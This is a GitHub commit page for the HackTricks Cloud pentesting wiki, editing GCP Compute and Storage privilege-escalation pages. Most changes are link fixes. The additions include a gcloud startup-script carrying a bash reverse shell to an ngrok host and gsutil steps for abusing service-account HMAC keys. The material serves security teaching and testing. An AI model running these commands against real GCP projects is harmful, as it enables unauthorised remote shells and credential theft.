Skip to content

Commit

Permalink
GITBOOK-627: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Jun 16, 2024
1 parent 5509686 commit 6743320
Show file tree
Hide file tree
Showing 3 changed files with 41 additions and 16 deletions.
24 changes: 19 additions & 5 deletions ...sting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand All @@ -22,6 +22,10 @@ For more information about Compute and VPC (netowork) in GCP check:
[gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/)
{% endcontent-ref %}

{% hint style="danger" %}
Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
{% endhint %}

### `compute.projects.setCommonInstanceMetadata`

With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
Expand All @@ -36,6 +40,16 @@ For more information about how to exploit this permission check:
[gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md)
{% endcontent-ref %}

You could aslo perform this attack by adding new startup-script and rebooting the instance:

```bash
gcloud compute instances add-metadata my-vm-instance \
--metadata startup-script='#!/bin/bash
bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &'

gcloud compute instances reset my-vm-instance
```

### `compute.instances.setMetadata`

This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**.
Expand Down Expand Up @@ -88,12 +102,12 @@ Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to det

### Bypass Access Scopes

Following this link you find some [**ideas to try to bypass access scopes**](../../../gcp-security/gcp-privilege-escalation/).
Following this link you find some [**ideas to try to bypass access scopes**](../).

### Local Privilege Escalation in GCP Compute instance

{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}

## References
Expand All @@ -109,7 +123,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
5 changes: 4 additions & 1 deletion pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -50,11 +50,14 @@ Cloud Storage's "interoperability" feature, designed for **cross-cloud interacti
gsutil hmac create <sa-email>

# Configure gsutil to use it
gsutil config -a
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true
```

Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
Expand Down
28 changes: 18 additions & 10 deletions pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand Down Expand Up @@ -97,8 +97,8 @@ gcloud compute disks get-iam-policy <disk>

For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page:

{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}

### Privilege Escalation
Expand All @@ -111,20 +111,20 @@ In the following page, you can check how to **abuse compute permissions to escal

### Unauthenticated Enum

{% content-ref url="../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
[gcp-compute-unauthenticated-enum.md](../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
{% content-ref url="../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
[gcp-compute-unauthenticated-enum.md](../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
{% endcontent-ref %}

### Post Exploitation

{% content-ref url="../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
[gcp-compute-post-exploitation.md](../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md)
{% endcontent-ref %}

### Persistence

{% content-ref url="../../../gcp-security/gcp-persistence/gcp-compute-persistence.md" %}
[gcp-compute-persistence.md](../../../gcp-security/gcp-persistence/gcp-compute-persistence.md)
{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %}
[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md)
{% endcontent-ref %}

## Serial Console Logs
Expand All @@ -141,6 +141,14 @@ You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/r
gcloud compute instances get-serial-port-output <instance-name>
```

## Startup Scripts output

It's possible to see the **output of the statup scripts** from the VM executing:

```bash
sudo journalctl -u google-startup-scripts.service
```

## OS Configuration Manager

You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM.
Expand Down Expand Up @@ -246,7 +254,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

0 comments on commit 6743320

Please sign in to comment.